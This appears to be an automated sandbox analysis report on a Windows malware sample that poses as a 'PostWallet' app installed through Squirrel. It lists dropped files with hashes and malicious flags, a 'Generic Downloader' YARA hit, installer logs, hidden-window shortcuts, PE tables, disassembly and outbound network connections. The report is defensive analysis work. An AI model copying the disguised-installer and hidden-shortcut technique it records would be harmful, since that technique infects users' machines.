                                        MD5:B4DAC714A14BF703C5F62CEF9250B08E
                                        SHA1:FBCA927E808E9BFB03DD4D18F8D7976DF45C1CA8
                                        SHA-256:083879DC3088B58AF59F1E9CF3A6AE970E8CF8399CA09988D280E6BFDF44C40B
                                        SHA-512:834C561FB7B11DE8BB3C6D4A25410F00D4B5C265C602D8A734C16108913D4E3CD4FD01A47854845F180555936153B63E635DFFF05BEF1B5534916F073943CD74
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):80800
                                        Entropy (8bit):6.781496286846518
                                        Encrypted:false
                                        SSDEEP:1536:FRk1rh/be3Z1bij+8xG+sQxzQF50I9VSHIecbWZOUXYOe0/zuvY:FRk/+Z1z8s+s+QrTmIecbWIA7//gY
                                        MD5:1E6E97D60D411A2DEE8964D3D05ADB15
                                        SHA1:0A2FE6EC6B6675C44998C282DBB1CD8787612FAF
                                        SHA-256:8598940E498271B542F2C04998626AA680F2172D0FF4F8DBD4FFEC1A196540F9
                                        SHA-512:3F7D79079C57786051A2F7FACFB1046188049E831F12B549609A8F152664678EE35AD54D1FFF4447428B6F76BEA1C7CA88FA96AAB395A560C6EC598344FCC7FA
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.Dq..*"..*"..*"..+#..*".."..*"..+"4.*"}.)#..*"}..#..*"}./#..*"}.*#..*"}.."..*"}.(#..*"Rich..*"........................PE..L...7.O.........."!... .....................................................P............@A........................0........ .......0...................'...@.......$..T............................#..@............ ...............................text...D........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):577024
                                        Entropy (8bit):6.751558391430317
                                        Encrypted:false
                                        SSDEEP:12288:cjR3E7WHbd+OeO+OeNhBBhhBBwOqqVg4MB2l1tWmmmXEstgE61IsEjIA:83DbDOtdMB2Wgg51IsEj7
                                        MD5:534D947D95726726B8EB8E9FAC82483E
                                        SHA1:1745FA80DF5D86E5F077914DED73F581B368ACCF
                                        SHA-256:EC5EF035F0148CAACCC6A2A81657BA67612DC3E521646ED1F65F56712D77F03C
                                        SHA-512:149C0EFC39E1FA4B43BE1642DF6D1B0954AF41F0A9AE992A2E55D7660248F265A90DD17268A33072A441BA59119EEC6D9B94607603F115BFF04F3E2F0CC82BD2
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.nYJ.=YJ.=YJ.=M!.<HJ.=M!.<.J.=M!.<NJ.=90.<VJ.=90.<AJ.=90.<.J.=M!.<PJ.=YJ.=.J.==0.<.J.==0.<[J.==0.<XJ.==0w=XJ.==0.<XJ.=RichYJ.=................PE..L...8..e...........!... .............|....................................... ............@.........................0w.......Y..d...............................XI......p...........................(...@............................................text............................... ..`.rdata..Xr.......t..................@..@.data....N...p...0...R..............@....rsrc...............................@..@.reloc..XI.......J..................@..B........................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                        Category:dropped
                                        Size (bytes):5669931
                                        Entropy (8bit):7.999965927440836
                                        Encrypted:true
                                        SSDEEP:98304:c0KviiPecd1Muk3g6WKv+808OAInI7hkeQpydfHH7V74mfRk6mttTGkZIfzP8wHM:Qv3Pecdiuk3g6WKK7ChUydfn7VsmJMDV
                                        MD5:0F0E96F3DA3D605C7A73D88B2ECE8CD0
                                        SHA1:4060A13252162CD46DAF3ED52E477A4BA8DE70C1
                                        SHA-256:8D94AA447236A4CB95E69FE93CB94A8AFF388334BA493CC70DBC26D058350C6C
                                        SHA-512:B5E6F27976A25B333FAD13ADAF2F571D08BCD14F2ADB5DA71A62893C259191CF6B51EE2876A95311A1196E2F43288BE9285A27B2F82D6980B58DA8B5289621D2
                                        Malicious:false
                                        Preview:PK..........gX................lib/PK..........gX................lib/net48/PK..........gXH.......0]......lib/net48/FilePost.a.exe.].|S...I.6B .[.Z. ..t....R..6.....?....?1A..(K...L..M7...6.2.P.W..-....[....f.j)X..=.._...?.%y..s.=..s.=...-...%CQ.......*.S.....(}.x....#.k-3.....y.......+..|.+..{_...;....-XroA...........5T...1n.....1.]..\.[.{.O^G.~...... .>..}.2...m.....s~.c...t..x.J../..-..,....*.g...V...LE.Y.f.).j.m.;H..K.HsE...63..UQ.8W.r.......oI=..../.$>.ZD......L.5...,J.CQ..^Qf^@........'.N.9...2..p...~....q[...P.uK.}%..E.C.}...O.+....0..F.,.....\.uK.\.F......_...;......../~....I.....[..(....[...j.dE...W.._....~.p.G.9.JF.C$..Z}....h...DYg.\U.<;.U..z.l.C.Z...&+...."^....^..0rO?U...o...D.R.^r....:.........]..K. .-...9..a......G.[e.u..M..z._k....Gr......A...0....?+..o.i.@.........p.9..<(..:h.......mAIc.J..O...(..f.E....9I C....S..(`4.+t.......f..MH......U...g..m...#J.:..e..'8r-..d3V.K.~$$.....3..k.0..+.5.s......@.u...rK.o.....V..<]X.....d......
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                        Category:dropped
                                        Size (bytes):79
                                        Entropy (8bit):4.9037382300235866
                                        Encrypted:false
                                        SSDEEP:3:mOQ8mzcGw0BgVPKWdHYhJxrGEtTn:m/zcGbB4FdgjGEdn
                                        MD5:535A03DF0527BA001F69A849F2495975
                                        SHA1:0E7B27A6FA9B14262C1C4BEB82E7367A12C03BC9
                                        SHA-256:0EEE2ABD684BC67E6FA1026229B92F3B4C11168D8286200B2DE85AC196417929
                                        SHA-512:8DC13CB44E032A5AF4E23393B26C50193DFC1C8FF4F90B0EEC915CA4867770A5A54170E52F6587189C2FB8FC10226BD008CF0F443E4507C8901C4983CBC74130
                                        Malicious:false
                                        Preview:.4060A13252162CD46DAF3ED52E477A4BA8DE70C1 PostWallet-1.0.0-full.nupkg 5669931
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                        Category:dropped
                                        Size (bytes):79
                                        Entropy (8bit):4.9037382300235866
                                        Encrypted:false
                                        SSDEEP:3:mOQ8mzcGw0BgVPKWdHYhJxrGEtTn:m/zcGbB4FdgjGEdn
                                        MD5:535A03DF0527BA001F69A849F2495975
                                        SHA1:0E7B27A6FA9B14262C1C4BEB82E7367A12C03BC9
                                        SHA-256:0EEE2ABD684BC67E6FA1026229B92F3B4C11168D8286200B2DE85AC196417929
                                        SHA-512:8DC13CB44E032A5AF4E23393B26C50193DFC1C8FF4F90B0EEC915CA4867770A5A54170E52F6587189C2FB8FC10226BD008CF0F443E4507C8901C4983CBC74130
                                        Malicious:false
                                        Preview:.4060A13252162CD46DAF3ED52E477A4BA8DE70C1 PostWallet-1.0.0-full.nupkg 5669931
                                        Process:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                        Category:dropped
                                        Size (bytes):5669931
                                        Entropy (8bit):7.999965927440836
                                        Encrypted:true
                                        SSDEEP:98304:c0KviiPecd1Muk3g6WKv+808OAInI7hkeQpydfHH7V74mfRk6mttTGkZIfzP8wHM:Qv3Pecdiuk3g6WKK7ChUydfn7VsmJMDV
                                        MD5:0F0E96F3DA3D605C7A73D88B2ECE8CD0
                                        SHA1:4060A13252162CD46DAF3ED52E477A4BA8DE70C1
                                        SHA-256:8D94AA447236A4CB95E69FE93CB94A8AFF388334BA493CC70DBC26D058350C6C
                                        SHA-512:B5E6F27976A25B333FAD13ADAF2F571D08BCD14F2ADB5DA71A62893C259191CF6B51EE2876A95311A1196E2F43288BE9285A27B2F82D6980B58DA8B5289621D2
                                        Malicious:false
                                        Preview:PK..........gX................lib/PK..........gX................lib/net48/PK..........gXH.......0]......lib/net48/FilePost.a.exe.].|S...I.6B .[.Z. ..t....R..6.....?....?1A..(K...L..M7...6.2.P.W..-....[....f.j)X..=.._...?.%y..s.=..s.=...-...%CQ.......*.S.....(}.x....#.k-3.....y.......+..|.+..{_...;....-XroA...........5T...1n.....1.]..\.[.{.O^G.~...... .>..}.2...m.....s~.c...t..x.J../..-..,....*.g...V...LE.Y.f.).j.m.;H..K.HsE...63..UQ.8W.r.......oI=..../.$>.ZD......L.5...,J.CQ..^Qf^@........'.N.9...2..p...~....q[...P.uK.}%..E.C.}...O.+....0..F.,.....\.uK.\.F......_...;......../~....I.....[..(....[...j.dE...W.._....~.p.G.9.JF.C$..Z}....h...DYg.\U.<;.U..z.l.C.Z...&+...."^....^..0rO?U...o...D.R.^r....:.........]..K. .-...9..a......G.[e.u..M..z._k....Gr......A...0....?+..o.i.@.........p.9..<(..:h.......mAIc.J..O...(..f.E....9I C....S..(`4.+t.......f..MH......U...g..m...#J.:..e..'8r-..d3V.K.~$$.....3..k.0..+.5.s......@.u...rK.o.....V..<]X.....d......
                                        Process:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                        Category:dropped
                                        Size (bytes):79
                                        Entropy (8bit):4.9037382300235866
                                        Encrypted:false
                                        SSDEEP:3:mOQ8mzcGw0BgVPKWdHYhJxrGEtTn:m/zcGbB4FdgjGEdn
                                        MD5:535A03DF0527BA001F69A849F2495975
                                        SHA1:0E7B27A6FA9B14262C1C4BEB82E7367A12C03BC9
                                        SHA-256:0EEE2ABD684BC67E6FA1026229B92F3B4C11168D8286200B2DE85AC196417929
                                        SHA-512:8DC13CB44E032A5AF4E23393B26C50193DFC1C8FF4F90B0EEC915CA4867770A5A54170E52F6587189C2FB8FC10226BD008CF0F443E4507C8901C4983CBC74130
                                        Malicious:false
                                        Preview:.4060A13252162CD46DAF3ED52E477A4BA8DE70C1 PostWallet-1.0.0-full.nupkg 5669931
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (364), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2354
                                        Entropy (8bit):5.347051502078819
                                        Encrypted:false
                                        SSDEEP:48:E/tHkuK9nxIelXbdkM/pu4zs7u4zMPMkZ6QQ6QcIPMkZ6QQiOnwoNEr:ElYUWVYj
                                        MD5:FB7DB7B02AF251FE82B545A649EE2318
                                        SHA1:A1E1A462BB0D5818897A9FB97022017C52551AAB
                                        SHA-256:E6CC5935A23855D8F85EEABE0AC8A4B31BBC5C718A3C22971FBFDFB91C44CB20
                                        SHA-512:95E1F6E20D0CD3161232C03C61A88062E6FEAA00092B91F3A6676AC2961CB3770340E0D547EAE9CFDCE62A3434D6D467D2198FDD7085B948933223863634974E
                                        Malicious:false
                                        Preview:.[07/03/24 10:35:59] info: Program: Starting Squirrel Updater: --install . --rerunningWithoutUAC..[07/03/24 10:35:59] info: Program: Starting install, writing to C:\Users\user\AppData\Local\SquirrelTemp..[07/03/24 10:35:59] info: Program: About to install to: C:\Users\user\AppData\Local\PostWallet..[07/03/24 10:35:59] info: CheckForUpdateImpl: Reading RELEASES file from C:\Users\user\AppData\Local\SquirrelTemp..[07/03/24 10:35:59] info: CheckForUpdateImpl: First run, starting from scratch..[07/03/24 10:35:59] info: ApplyReleasesImpl: Writing files to app directory: C:\Users\user\AppData\Local\PostWallet\app-1.0.0..[07/03/24 10:36:00] info: ApplyReleasesImpl: Squirrel Enabled Apps: []..[07/03/24 10:36:00] warn: ApplyReleasesImpl: No apps are marked as Squirrel-aware! Going to run them all..[07/03/24 10:36:00] info: ApplyReleasesImpl: About to create shortcuts for FilePost.a.exe, rootAppDir C:\Users\user\AppData\Local\PostWallet..[07/03/24 10:36:00] info: ApplyReleasesImpl: Crea
                                        Process:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1899520
                                        Entropy (8bit):5.894883178349122
                                        Encrypted:false
                                        SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                        MD5:A560BAD9E373EA5223792D60BEDE2B13
                                        SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                        SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                        SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{....*..{....*..{....*r.(......}......}......}....*....0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*..0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*....{....*..{....*
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:ISO-8859 text, with CR line terminators
                                        Category:dropped
                                        Size (bytes):4
                                        Entropy (8bit):2.0
                                        Encrypted:false
                                        SSDEEP:3:9:9
                                        MD5:A7E0F8AC46398A7876D1E40DD52C2AAB
                                        SHA1:B66922B4E6F09E23C072E4AFF49C67C3121DD5AF
                                        SHA-256:05174BBF0D407087E45B12BAAE17117426852FF3A9E58D12A0EBB9A10B409743
                                        SHA-512:E6B93215582F7F4F5E9292273A9466B5D0CC3A4EA7D77AE42854203755441DD5EDBEFB11FE8890CAE7783E41E2EDBF61EC7B03D7E5E9870A7821D4016B095F79
                                        Malicious:false
                                        Preview:....
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                        Category:dropped
                                        Size (bytes):2136
                                        Entropy (8bit):2.679977093044876
                                        Encrypted:false
                                        SSDEEP:24:8nLDaRHQJl+zqH9L9q2O4Zfqqd9HAKqyh7ECtU:8LmRHwl+zqH9L9q2ZfqqXAHyh7EWU
                                        MD5:90BE0660EE36A0209BC50D9DD9598E1F
                                        SHA1:5A9C96532946AADBDD6CB3C47F7965BB9300C516
                                        SHA-256:BB6C1BAA9ED2BE4ACDEEDDC954112E5231E1C2F7C0B6EB1D3AD68913F1623880
                                        SHA-512:A9151A94C447780504176FCB539C4F1104C3DFE460CC6EC0F0B734919346B07B1D7DF5D51D46732168CF65ADDCEE7E432D3A267B6F7B9681EBC91CC750A2C4FB
                                        Malicious:false
                                        Preview:L..................F.@......................................................O....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....`.1...........PostWallet..F............................................P.o.s.t.W.a.l.l.e.t.....z.6...........F.i.l.e.P.o.s.t...a...e.x.e...N............................................F.i.l.e.P.o.s.t...a...e.x.e...,.....P.o.s.t.W.a.l.l.e.t.1.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.F.i.l.e.P.o.s.t...a...e.x.e.1.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.a.p.p.-.1...0...0.6.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.F.i.l.e.P.o.s.t...a...e.x.e
                                        Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                        Category:dropped
                                        Size (bytes):2122
                                        Entropy (8bit):2.6791602023832
                                        Encrypted:false
                                        SSDEEP:24:8nLDaRHQJl+pqH9L9q2O4Zfqqd9HAKqyh7ECtU:8LmRHwl+pqH9L9q2ZfqqXAHyh7EWU
                                        MD5:D6166FF8DE9CFE5A9197C15881EC833E
                                        SHA1:63A40A00A9A9465814913C4A74AD7AAE013EE9B0
                                        SHA-256:914628EFA73C14808689F00957724B50355393DE558206F24BB71C30924CF220
                                        SHA-512:E08AA3F9BA61B8729EF94B6515D0D3EE940C85A23C6D34B92E0A003BA880D6D23B1B191C9435115D9322D7B960C7207D3509630CE4DA0A1550D68A758F0FAE20
                                        Malicious:false
                                        Preview:L..................F.@......................................................O....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....`.1...........PostWallet..F............................................P.o.s.t.W.a.l.l.e.t.....z.6...........F.i.l.e.P.o.s.t...a...e.x.e...N............................................F.i.l.e.P.o.s.t...a...e.x.e...,.....P.o.s.t.W.a.l.l.e.t.*.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.F.i.l.e.P.o.s.t...a...e.x.e.1.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.a.p.p.-.1...0...0.6.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.F.i.l.e.P.o.s.t...a...e.x.e.........%USER
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.9945445565179565
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:00023948209303294#U00ac320302282349843984903.exe
                                        File size:6'569'472 bytes
                                        MD5:9e1e30202d950ce1f273eb2e8492f39b
                                        SHA1:4d76edbdb6976aa2acbbe9c4264a6fc9176584ff
                                        SHA256:ddef5168dd82c49304884fd4fb0720a865588dad07f1350ee2eba97cf15ee4c7
                                        SHA512:25402db8233ae501a2c6a6646cb26414b90c6e996fb9b19702e08700a56c40550c01cae92332547ed58f821dd3a447613cc716f77542476bda13f9c9dab510d6
                                        SSDEEP:196608:TrH3BZaqdwA8xEAQmoPOt20dr31XS658JTBPWb8QfiIq28O:Tr/DdAmAR3fdtS658JTBD/Z
                                        TLSH:BF663321B794D035E0371A3369E875214C7F7EA1972064AB77C42B7E86300D68B7ABBD
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X........................y.......................................................a...T.......T.Z.......2.....T.......Rich...
                                        Icon Hash:13170f6d2d6d6d33
                                        Entrypoint:0x40ab5c
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x5F70D7D7 [Sun Sep 27 18:20:07 2020 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:e6f4169f2a5c3a8f93171d9f593bd22a
                                        Instruction
                                        call 00007F026C71B6ACh
                                        jmp 00007F026C71AFCFh
                                        ret
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        push dword ptr [ebp+08h]
                                        mov esi, ecx
                                        call 00007F026C71B1ADh
                                        mov dword ptr [esi], 0041F45Ch
                                        mov eax, esi
                                        pop esi
                                        pop ebp
                                        retn 0004h
                                        and dword ptr [ecx+04h], 00000000h
                                        mov eax, ecx
                                        and dword ptr [ecx+08h], 00000000h
                                        mov dword ptr [ecx+04h], 0041F464h
                                        mov dword ptr [ecx], 0041F45Ch
                                        ret
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        push dword ptr [ebp+08h]
                                        mov esi, ecx
                                        call 00007F026C71B17Ah
                                        mov dword ptr [esi], 0041F478h
                                        mov eax, esi
                                        pop esi
                                        pop ebp
                                        retn 0004h
                                        and dword ptr [ecx+04h], 00000000h
                                        mov eax, ecx
                                        and dword ptr [ecx+08h], 00000000h
                                        mov dword ptr [ecx+04h], 0041F480h
                                        mov dword ptr [ecx], 0041F478h
                                        ret
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        mov esi, ecx
                                        lea eax, dword ptr [esi+04h]
                                        mov dword ptr [esi], 0041F43Ch
                                        and dword ptr [eax], 00000000h
                                        and dword ptr [eax+04h], 00000000h
                                        push eax
                                        mov eax, dword ptr [ebp+08h]
                                        add eax, 04h
                                        push eax
                                        call 00007F026C71C8BCh
                                        pop ecx
                                        pop ecx
                                        mov eax, esi
                                        pop esi
                                        pop ebp
                                        retn 0004h
                                        lea eax, dword ptr [ecx+04h]
                                        mov dword ptr [ecx], 0041F43Ch
                                        push eax
                                        call 00007F026C71C907h
                                        pop ecx
                                        ret
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        mov esi, ecx
                                        lea eax, dword ptr [esi+04h]
                                        mov dword ptr [esi], 0041F43Ch
                                        push eax
                                        call 00007F026C71C8F0h
                                        test byte ptr [ebp+08h], 00000001h
                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2932c | 0x50 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x618fd0 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x645000 | 0x190c | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x27720 | 0x70 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1f398 | 0x40 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x1f000 | 0x1a4 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x28ef0 | 0xe0 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x1000 | 0x1d32b | 0x1d400 | 723597f58d5674921108e642a8e1b5b4 | False | 0.5962540064102564 | data | 6.658318567238198 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata | 0x1f000 | 0xacae | 0xae00 | fa1645fd03dda975b8bd67904b34af32 | False | 0.44526760057471265 | data | 4.948544868021258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data | 0x2a000 | 0x1870 | 0xe00 | f8724007e5d2ce85c65b5408a736d005 | False | 0.21484375 | data | 3.016754020922221 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc | 0x2c000 | 0x618fd0 | 0x619000 | ec7f9a989e7f06bc72b68f43d45b374e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0x645000 | 0x190c | 0x1a00 | fca0dc86189b5b127d85095ebd6abd95 | False | 0.7630709134615384 | data | 6.514362877721557 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                        DATA | 0x2c340 | 0x616301 | Zip archive data, at least v2.0 to extract, compression method=deflate | English | United States | 1.0003108978271484
                                        FLAGS | 0x642644 | 0xc | data | English | United States | 1.6666666666666667
                                        RT_ICON | 0x642650 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.21774193548387097
                                        RT_ICON | 0x642938 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.11597472924187725
                                        RT_ICON | 0x6431e0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.21774193548387097
                                        RT_ICON | 0x6434c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.11597472924187725
                                        RT_STRING | 0x643d70 | 0x418 | data | English | United States | 0.3148854961832061
                                        RT_STRING | 0x644188 | 0x604 | data | English | United States | 0.21363636363636362
                                        RT_STRING | 0x64478c | 0x152 | data | English | United States | 0.5591715976331361
                                        RT_GROUP_ICON | 0x6448e0 | 0x22 | data | English | United States | 1.0588235294117647
                                        RT_GROUP_ICON | 0x644904 | 0x22 | data | English | United States | 1.088235294117647
                                        RT_VERSION | 0x644928 | 0x2c0 | data | English | United States | 0.4659090909090909
                                        RT_MANIFEST | 0x644be8 | 0x3e7 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (939), with CRLF line terminators | English | United States | 0.5145145145145145
                                        DLL | Import
                                        KERNEL32.dll | LoadResource, FindResourceW, lstrlenW, GetProcAddress, GetModuleHandleW, DeleteCriticalSection, GetTempPathW, GetLastError, GetTempFileNameW, MoveFileW, WaitForSingleObject, GetExitCodeProcess, CloseHandle, DeleteFileW, GetModuleFileNameW, GetCurrentProcess, LoadLibraryW, FreeLibrary, InitializeCriticalSectionEx, GetFileAttributesW, CreateFileW, SetFilePointer, ReadFile, VerSetConditionMask, GetCurrentDirectoryW, MultiByteToWideChar, LocalFileTimeToFileTime, WideCharToMultiByte, CreateDirectoryW, WriteFile, SetFileTime, FreeResource, SizeofResource, LockResource, CreateProcessW, GetSystemDirectoryW, SetDefaultDllDirectories, GetCurrentThreadId, DecodePointer, RaiseException, LeaveCriticalSection, EnterCriticalSection, lstrcmpiW, LoadLibraryExW, GetConsoleMode, GetConsoleCP, SystemTimeToFileTime, VerifyVersionInfoW, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsDebuggerPresent, OutputDebugStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, GetModuleHandleExW, GetStdHandle, HeapFree, HeapAlloc, GetFileType, CompareStringW, LCMapStringW, HeapSize, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle, GetStringTypeW, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, WriteConsoleW
                                        SHLWAPI.dll | PathIsUNCW
                                        COMCTL32.dll | InitCommonControlsEx
                                        Language of compilation system | Country where language is spoken | Map
                                        English | United States |
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Mar 7, 2024 10:36:10.053052902 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.053076982 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.053090096 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.053137064 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.053848982 CET49729443192.168.2.416.12.1.14
